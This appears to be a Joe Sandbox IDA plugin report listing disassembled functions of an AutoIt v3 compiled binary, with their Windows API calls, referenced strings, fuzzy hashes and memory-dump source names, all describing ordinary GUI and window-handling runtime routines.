Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: e47c7adfb1138fc8880ccbbccb53ae9d9b58c1e5dc9e314fe8405ee16201f1e1
Instruction ID: 5bf5b6f2d38b15856856db33e63de9462fedbdbf16110de31e2f3072b3ec4bf3
Opcode Fuzzy Hash: e47c7adfb1138fc8880ccbbccb53ae9d9b58c1e5dc9e314fe8405ee16201f1e1
Instruction Fuzzy Hash: 7841E772A00209BADB15BB748C47EBF77ECDF45720F101059FA04B6192EB75EA01A7A5

Uniqueness

Uniqueness Score: -1.00%

Function 00ED2BA9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32 ref: 00ED2C8C
GetSystemMetrics.USER32 ref: 00ED2C94
SystemParametersInfoW.USER32 ref: 00ED2CBF
GetSystemMetrics.USER32 ref: 00ED2CC7
GetSystemMetrics.USER32 ref: 00ED2CEC
SetRect.USER32 ref: 00ED2D09
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00ED2D19
CreateWindowExW.USER32 ref: 00ED2D4C
SetWindowLongW.USER32 ref: 00ED2D60
GetClientRect.USER32(00000000,000000FF), ref: 00ED2D7E
GetStockObject.GDI32(00000011), ref: 00ED2D9A
SendMessageW.USER32(00000000,00000030,00000000), ref: 00ED2DA5

Part of subcall function 00ED2714: GetCursorPos.USER32(?,?,00F977B0,?,00F977B0,00F977B0,?,00F5C5FF,00000000,00000001,?,?,?,00F0BD40,?,?), ref: 00ED2727
Part of subcall function 00ED2714: ScreenToClient.USER32 ref: 00ED2744
Part of subcall function 00ED2714: GetAsyncKeyState.USER32(00000001), ref: 00ED2769
Part of subcall function 00ED2714: GetAsyncKeyState.USER32(00000002), ref: 00ED2777

SetTimer.USER32(00000000,00000000,00000028,00ED13C7), ref: 00ED2DCC

Strings

AutoIt v3 GUI, xrefs: 00ED2D44

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 44fd33168fefbe11e0f98a0ed388151fbd8e1b12aa5d64107df11bd06dd3717d
Instruction ID: d985e93373a0e3914e063e7d75e4cb9b6b46d1d71fb774b78a0f2f6e6a2cc26c
Opcode Fuzzy Hash: 44fd33168fefbe11e0f98a0ed388151fbd8e1b12aa5d64107df11bd06dd3717d
Instruction Fuzzy Hash: CBB17075A1030A9FDB14DFA8CD45BAE7BB4FB18314F20422AFA15A72D0DB70A851EF51

Uniqueness

Uniqueness Score: -1.00%

Function 00EF0429 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 349COMMON

Download Yara Rule

APIs

Part of subcall function 00EE1821: _memmove.LIBCMT ref: 00EE185B

GetForegroundWindow.USER32(00F60980,?,?,?,?,?), ref: 00EF04E3
IsWindow.USER32(?), ref: 00F266BB

Strings

ACTIVE, xrefs: 00F26488
INSTANCE, xrefs: 00F265FA
HANDLE, xrefs: 00F2649E
REGEXPCLASS, xrefs: 00F26506
TITLE, xrefs: 00F26650
CLASS, xrefs: 00F264E5
REGEXPTITLE, xrefs: 00F264B4
ALL, xrefs: 00F26622
LAST, xrefs: 00F26472

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Window$Foreground_memmove
String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
API String ID: 3828923867-1919597938
Opcode ID: 6b8727626ee11f4cdc3e765caa5dfe96c636178f63f9f40d063e19caee86103e
Instruction ID: cfbb6e89c52ddb1f21223b9752e17c27f8c016dce1d54915f631f71e6d85f971
Opcode Fuzzy Hash: 6b8727626ee11f4cdc3e765caa5dfe96c636178f63f9f40d063e19caee86103e
Instruction Fuzzy Hash: 09D11630504256DBDB14EF20D8419AABBF0FF54314F204A1DF555A72A3DF30E999EB92

Uniqueness

Uniqueness Score: -1.00%

Function 00F5441F Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00F544AC
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00F5456C

Strings

SELECT, xrefs: 00F54606
VIEWCHANGE, xrefs: 00F5472B
SELECTCLEAR, xrefs: 00F545EB
ISSELECTED, xrefs: 00F54577
FINDITEM, xrefs: 00F546DF
SELECTINVERT, xrefs: 00F5463C
GETSELECTEDCOUNT, xrefs: 00F5454F
GETITEMCOUNT, xrefs: 00F544DE
GETSELECTED, xrefs: 00F5469A
SELECTALL, xrefs: 00F545D3
DESELECT, xrefs: 00F5465A
GETTEXT, xrefs: 00F54515
GETSUBITEMCOUNT, xrefs: 00F544F7

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: 1a9c00ed747ed6a418fe94ae7efcec36e3dbeee2054c39cf5c6c8c01ff6cf2e5
Instruction ID: 6c6bd6ceb81800db3727af3572ec27c6a2d9774d784f45bca8f57e3b5c2c7489
Opcode Fuzzy Hash: 1a9c00ed747ed6a418fe94ae7efcec36e3dbeee2054c39cf5c6c8c01ff6cf2e5
Instruction Fuzzy Hash: 23A1AE312042019FCB14EF20D851A6AB3E5EF89315F104969FD56AB7D2DB31FC4ADB91

Uniqueness

Uniqueness Score: -1.00%

Function 00F456C8 Relevance: 27.1, APIs: 18, Instructions: 124COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 00F456E1
LoadCursorW.USER32(00000000,00007F8A), ref: 00F456EC
LoadCursorW.USER32(00000000,00007F00), ref: 00F456F7
LoadCursorW.USER32(00000000,00007F03), ref: 00F45702
LoadCursorW.USER32(00000000,00007F8B), ref: 00F4570D
LoadCursorW.USER32(00000000,00007F01), ref: 00F45718
LoadCursorW.USER32(00000000,00007F81), ref: 00F45723
LoadCursorW.USER32(00000000,00007F88), ref: 00F4572E
LoadCursorW.USER32(00000000,00007F80), ref: 00F45739
LoadCursorW.USER32(00000000,00007F86), ref: 00F45744
LoadCursorW.USER32(00000000,00007F83), ref: 00F4574F
LoadCursorW.USER32(00000000,00007F85), ref: 00F4575A
LoadCursorW.USER32(00000000,00007F82), ref: 00F45765
LoadCursorW.USER32(00000000,00007F84), ref: 00F45770
LoadCursorW.USER32(00000000,00007F04), ref: 00F4577B
LoadCursorW.USER32(00000000,00007F02), ref: 00F45786
GetCursorInfo.USER32(?), ref: 00F45796
GetLastError.KERNEL32(00000001,00000000), ref: 00F457C1

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: 21f586db2015a8b4065e6efb43e1ed3a8d67c7c3fe09367bcfb04b76e7a93300
Instruction ID: ceb9e45d2107c3128881097b6795b0ca87daa5c91887ca482ae3d2eca93b9698
Opcode Fuzzy Hash: 21f586db2015a8b4065e6efb43e1ed3a8d67c7c3fe09367bcfb04b76e7a93300
Instruction Fuzzy Hash: A3415370E04319ABDB109FBA8C49D6FFEF8EF51B20B10452FE519E7291DAB8A401CE51

Uniqueness

Uniqueness Score: -1.00%

Function 00F2B13A Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32 ref: 00F2B17B
__swprintf.LIBCMT ref: 00F2B21C
_wcscmp.LIBCMT ref: 00F2B22F
SendMessageTimeoutW.USER32 ref: 00F2B284
_wcscmp.LIBCMT ref: 00F2B2C0
GetClassNameW.USER32 ref: 00F2B2F7
GetDlgCtrlID.USER32 ref: 00F2B349
GetWindowRect.USER32 ref: 00F2B37F
GetParent.USER32(?), ref: 00F2B39D
ScreenToClient.USER32 ref: 00F2B3A4
GetClassNameW.USER32 ref: 00F2B41E
_wcscmp.LIBCMT ref: 00F2B432
GetWindowTextW.USER32 ref: 00F2B458
_wcscmp.LIBCMT ref: 00F2B46C

Part of subcall function 00EF385C: _iswctype.LIBCMT ref: 00EF3864

Strings

%s%u, xrefs: 00F2B216

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: 9f41e9098213251d9564d1ccf27bd0064e402c5592c3dd8689a3b283c5a7f177
Instruction ID: 24cdc4de7913941e5f149ded83edcf2f9ef332a3b0ac13e47049e95ea452a512
Opcode Fuzzy Hash: 9f41e9098213251d9564d1ccf27bd0064e402c5592c3dd8689a3b283c5a7f177
Instruction Fuzzy Hash: DEA11171600326EFD718EF60D894BAAB7E8FF44360F104629FDA9D2091DB30E955DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00F2BA6D Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32 ref: 00F2BAB1
_wcscmp.LIBCMT ref: 00F2BAC2
GetWindowTextW.USER32 ref: 00F2BAEA
CharUpperBuffW.USER32(?,00000000), ref: 00F2BB07
_wcscmp.LIBCMT ref: 00F2BB25
_wcsstr.LIBCMT ref: 00F2BB36
GetClassNameW.USER32 ref: 00F2BB6E
_wcscmp.LIBCMT ref: 00F2BB7E
GetWindowTextW.USER32 ref: 00F2BBA5
GetClassNameW.USER32 ref: 00F2BBEE
_wcscmp.LIBCMT ref: 00F2BBFE
GetClassNameW.USER32 ref: 00F2BC26
GetWindowRect.USER32 ref: 00F2BC8F

Strings

@, xrefs: 00F2BA92
ThumbnailClass, xrefs: 00F2BB79, 00F2BBF9

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 737d2faf89993890c8aa3ac5b4c62957a59ac3f82730898e75dd94e86b46be42
Instruction ID: 7404dd94ff04c0edfa5fbb77a467aa9422b6c0b341e4c73c2b52159f6cc68044
Opcode Fuzzy Hash: 737d2faf89993890c8aa3ac5b4c62957a59ac3f82730898e75dd94e86b46be42
Instruction Fuzzy Hash: 2381D37140831A9FDB04DF10E885FAA77E8FF84324F14846AFD899A096DB34DD45EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F2B8B6 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00F2B915

Strings

REGEXP=, xrefs: 00F2B92A
ACTIVE, xrefs: 00F2B8F0
[ALL, xrefs: 00F2B9BB
[CLASS:, xrefs: 00F2B965
[REGEXPTITLE:, xrefs: 00F2B93D
[ACTIVE, xrefs: 00F2B902
[HANDLE:, xrefs: 00F2B921
ALL, xrefs: 00F2B9A9
HANDLE=, xrefs: 00F2B90E
[LAST, xrefs: 00F2B9C2
LAST, xrefs: 00F2B8DA
CLASSNAME=, xrefs: 00F2B952

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 0a188ad9989ccbaf35f606f7541f8f641d54eaaa6c1dc5df1013e6335170356e
Instruction ID: 4833abadd4f4c93ba86c66482e658b01d8a045e4d3b1966c4643b894d8c83072
Opcode Fuzzy Hash: 0a188ad9989ccbaf35f606f7541f8f641d54eaaa6c1dc5df1013e6335170356e
Instruction Fuzzy Hash: E031D031A40219A6EB14FB61DC43EED73F4AF10760F600126FA51B10D9EB66AE84E653

Uniqueness

Uniqueness Score: -1.00%

Function 00F2CB97 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00F2CBAA
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00F2CBBC
SetWindowTextW.USER32(?,?), ref: 00F2CBD3
GetDlgItem.USER32 ref: 00F2CBE8
SetWindowTextW.USER32(00000000,?), ref: 00F2CBEE
GetDlgItem.USER32 ref: 00F2CBFE
SetWindowTextW.USER32(00000000,?), ref: 00F2CC04
SendDlgItemMessageW.USER32 ref: 00F2CC25
SendDlgItemMessageW.USER32 ref: 00F2CC3F
GetWindowRect.USER32 ref: 00F2CC48
SetWindowTextW.USER32(?,?), ref: 00F2CCB3
GetDesktopWindow.USER32 ref: 00F2CCB9
GetWindowRect.USER32 ref: 00F2CCC0
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00F2CD0C
GetClientRect.USER32(?,?), ref: 00F2CD19
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00F2CD3E
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00F2CD69

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: 9f37df02798d715d99e1515c9dea6ce73f45277de22095713de38ce041ae364c
Instruction ID: cd772deb7f0810ecc21be7bf1c66600e7e2782c5a86fe500a42f38eff0641af0
Opcode Fuzzy Hash: 9f37df02798d715d99e1515c9dea6ce73f45277de22095713de38ce041ae364c
Instruction Fuzzy Hash: CD518D70900709EFDB209FA8DE89B6FBBF5FF44714F100918E556A25A0CBB5A914EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00F5A7DE Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F5A87E
DestroyWindow.USER32(?,?), ref: 00F5A8F8

Part of subcall function 00EE1821: _memmove.LIBCMT ref: 00EE185B

CreateWindowExW.USER32 ref: 00F5A972
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00F5A994
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F5A9A7
DestroyWindow.USER32(00000000), ref: 00F5A9C9
CreateWindowExW.USER32 ref: 00F5AA00
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F5AA19
GetDesktopWindow.USER32 ref: 00F5AA32
GetWindowRect.USER32 ref: 00F5AA39
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00F5AA51
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00F5AA69

Part of subcall function 00ED29AB: GetWindowLongW.USER32(?,000000EB), ref: 00ED29BC

Strings

tooltips_class32, xrefs: 00F5A96B, 00F5A9F9
0, xrefs: 00F5A894

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: 728dd3dda77e2e3d4d5d2ad930a793eff6a18b8b9d2ed39b1cc9d2a1c4b91d3c
Instruction ID: 49800bb0fc830a0d71de5a288a6a0bf9a433245f796a05f4c17f9877850cb35f
Opcode Fuzzy Hash: 728dd3dda77e2e3d4d5d2ad930a793eff6a18b8b9d2ed39b1cc9d2a1c4b91d3c
Instruction Fuzzy Hash: 8B71A971550308AFD721DF28C808FAB77E5EB88310F14061DFA86872A1DB75E915EB62

Uniqueness

Uniqueness Score: -1.00%

Function 00F5CCA6 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00ED29E2: GetWindowLongW.USER32(?,000000EB), ref: 00ED29F3

DragQueryPoint.SHELL32(?,?), ref: 00F5CCCF

Part of subcall function 00F5B1A9: ClientToScreen.USER32(?,?), ref: 00F5B1D2
Part of subcall function 00F5B1A9: GetWindowRect.USER32 ref: 00F5B248
Part of subcall function 00F5B1A9: PtInRect.USER32(?,?,00F5C6BC), ref: 00F5B258

SendMessageW.USER32(?,000000B0,?,?), ref: 00F5CD38
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00F5CD43
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00F5CD66
_wcscat.LIBCMT ref: 00F5CD96
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00F5CDAD
SendMessageW.USER32(?,000000B0,?,?), ref: 00F5CDC6
SendMessageW.USER32(?,000000B1,?,?), ref: 00F5CDDD
SendMessageW.USER32(?,000000B1,?,?), ref: 00F5CDFF
DragFinish.SHELL32(?), ref: 00F5CE06
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00F5CEF9

Strings

@GUI_DRAGID, xrefs: 00F5CE71
@GUI_DRAGFILE, xrefs: 00F5CEA8
@GUI_DROPID, xrefs: 00F5CE26

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: a50edbc7c82b3fab706a504f99bb9998f46ae294863d7960993aa9730fc543d3
Instruction ID: f236a92c7b0c2bb7d7dc1a2c6001ce830f6dd378a5bb8ba2dee975f34b86ebbf
Opcode Fuzzy Hash: a50edbc7c82b3fab706a504f99bb9998f46ae294863d7960993aa9730fc543d3
Instruction Fuzzy Hash: B9618D71108304AFC711EF50DC85D9FBBF8EF88350F100A1EF6A6921A1DB719A49DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00F382D5 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 378timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 00F3831A
VariantCopy.OLEAUT32(00000000,?), ref: 00F38323
VariantClear.OLEAUT32(00000000), ref: 00F3832F
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00F3841D
__swprintf.LIBCMT ref: 00F3844D
VarR8FromDec.OLEAUT32(?,?), ref: 00F38479
VariantInit.OLEAUT32(?), ref: 00F3852A
SysFreeString.OLEAUT32(?), ref: 00F385BE
VariantClear.OLEAUT32(?), ref: 00F38618
VariantClear.OLEAUT32(?), ref: 00F38627
VariantInit.OLEAUT32(00000000), ref: 00F38665

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 00F38447
Default, xrefs: 00F384DA

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 3730832054-3931177956
Opcode ID: 89ae7e93a06e5255a97cff92d154a9edc2e5e3b425cff272641d84d9c877b421
Instruction ID: 07a8ee603bfa779404e369b816bb7c187cad32a1ce588cdda6cc15ad0b9004f4
Opcode Fuzzy Hash: 89ae7e93a06e5255a97cff92d154a9edc2e5e3b425cff272641d84d9c877b421
Instruction Fuzzy Hash: 04D1D172A04219DBCB209F61C885BAEB7B4BF047A0F248555F405EB281CF78DC46FBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F549CF Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00F54A61
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F54AAC

Strings

GETITEMCOUNT, xrefs: 00F54B8E
SELECT, xrefs: 00F54C5D
ISCHECKED, xrefs: 00F54C2F
GETSELECTED, xrefs: 00F54BBC
EXISTS, xrefs: 00F54B15
EXPAND, xrefs: 00F54B5E
UNCHECK, xrefs: 00F54C88
COLLAPSE, xrefs: 00F54AF2
GETTOTALCOUNT, xrefs: 00F54A93
GETTEXT, xrefs: 00F54BFF
CHECK, xrefs: 00F54ACC

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: 7a1e46a79a96a872c9f0b63d20c3b8dccd6a9b4316ca98508774e694c562bf59
Instruction ID: 2b6304481867499246442b682efde490cafd9f62e722e13ed587ff1de801cd45
Opcode Fuzzy Hash: 7a1e46a79a96a872c9f0b63d20c3b8dccd6a9b4316ca98508774e694c562bf59
Instruction Fuzzy Hash: 75918F702007119BCB14EF20C851A69B7E2EF94354F108859FD966B3A3DB35FD8AEB91

Uniqueness

Uniqueness Score: -1.00%

